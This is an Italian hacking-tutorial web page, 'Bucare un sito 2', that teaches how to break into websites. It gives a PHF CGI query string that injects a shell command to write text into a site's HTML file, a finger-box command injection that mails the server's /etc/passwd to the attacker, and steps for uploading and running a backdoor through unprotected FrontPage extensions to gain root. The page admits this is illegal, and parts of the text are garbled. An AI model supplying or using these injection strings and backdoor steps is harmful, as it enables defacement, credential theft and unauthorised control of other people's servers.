(¯`·._.·[°o.OKinG-InFeTO.o°]·._.·´¯)
Menu principale:
- Home Page
- Regole dell'Hacker
- Contattaci
- Hå¢kÎñG
- L'arte dell'Hacking
- ÐêFå¢ìÑg
- Entrare in reti Wireless
- Comando Netstat e IP
- Porte di connessione PC
- PC NetBiossati
- Trucchi Nokia
- Come entrare nei PC
- Come entrare nei Pc 2
- Guida perfetta sull'ANONIMATO!!
- Tool per essere Anonimi
- Cambiare pass account xp ad un'altro
- Siti per Decryttare pass Md5
- Ruba pass tramite chiavetta USB
- --->XSS<---
- Server di posta
- VìRû§
- Video TuToRial
- Hå¢kÎñG M§Ñ
- ÐC++
- Wìñdøw$ Xþ
Bucare un sito 2
Hå¢kÎñG > ÐêFå¢ìÑg
Inquesta guida spiegeò come BUCARE UN SITO WEB
(ricordo che farlo e inlegale quindi non mi assumo nessuna responsabilità nell'uso che ne verrà fatto)
I Browser Attack sono quegli attacchi che vengono fatti dal vostro browser,senza particolari software.Oltre ai vari attacchi PHF e Query,ci sono anche altri attacchi o varianti di PHF/Query
Cambiare una pagina web dal tuo browser
Questa è la stinga da usare per modificare una pagina web da tuo browser.
All'indirizzo http://www.sito.com aggiungiamo la seguente stringa cgi-bin/phf?Qalias=x%0a/bin/echo%20 "Crepa Lamer!!!"%20>>filename.html(questa è una variante del PHF).
Questa stringati permette di scrivere su filename.html e aggiungere "Crepa Lamer!!!" devono essere in formato html. Puoi inserire del testo delle immagini o qualsiasi altra cosa tu voglia.
Finger box hacking:
Diciamo di voler "bucare" un sito tipo www.tal de talis.com. La prima cosa da fare sara' scivere l'URL Http://www.tal de talis.com. [/color
]
Poi aggiungete all'url [color=red]/cgi-bin/finger
in modo da ottenere Http://www.aol.com/cgi-bin/finger.
Se il finger e' attivo un box dovrebbe apparire per inserire il nome della persona su cui eseguire il comando.
Se questo avviene tu hai la possibilita' di ricevere il file /etc/passwd.
La prossima cosa da fare sara' di trovare un mailto sulla web page (faq@tal de talis.com o webmaster@tal de talis.com ad esempio).
Ora ritorna al box e scrivi: faq@tal de talis.com;/bin/mail [email protected] > /etc/passwd ...questa stringa manda a voi una mail da faq@tal de talis.com contenente il file delle password(libiiiiidine!!!)
FrontPage
Il metodo che citerò adesso serve x inserire una backdoor in un sito che ha le estensioni di FrontPage. Per sapere se un sito ha le estensioni di FrontPage:
O c'è scritto direttamente sulla home page del sito. O guardate L'html della home page,e dovreste notare una cosa del genere:
meta name="GENERATOR" content="Microsoft FrontPage 3.0"
Apriamo il FrontPage98 o FrontPage Express e clicchiamo su File.
Apriamo Front Page Box,poi scegliamo la voce Apri Web esistente,mettiamo il sito da hackerare e premiamo OK.
Appena connessi, se ci chiederà la password dobbiamo lasciar stare,ma se non c'è la chiederà(cosa molto probabile),il 50%del lavoro è fatto.
Entriamo nella cartella CGI-BIN e facciamo un Up-Load e ci mettiamo una backdoor.
Andiamo al nostro amato browser,
digitiamo:htto://server_vittima/cgi-bin/nome_della_backdoor.exe così facciamo partire la nostra backdoor.
Adesso il server non ci darà nessuna risposta,e andiamo a vedere subito se la backdoor è stata attivata.
Se sì,siamo root.
Se invece la backdoor non viene attivata,dovete dare il tempo al server di aggiornarsi e far eseguire il trojan.
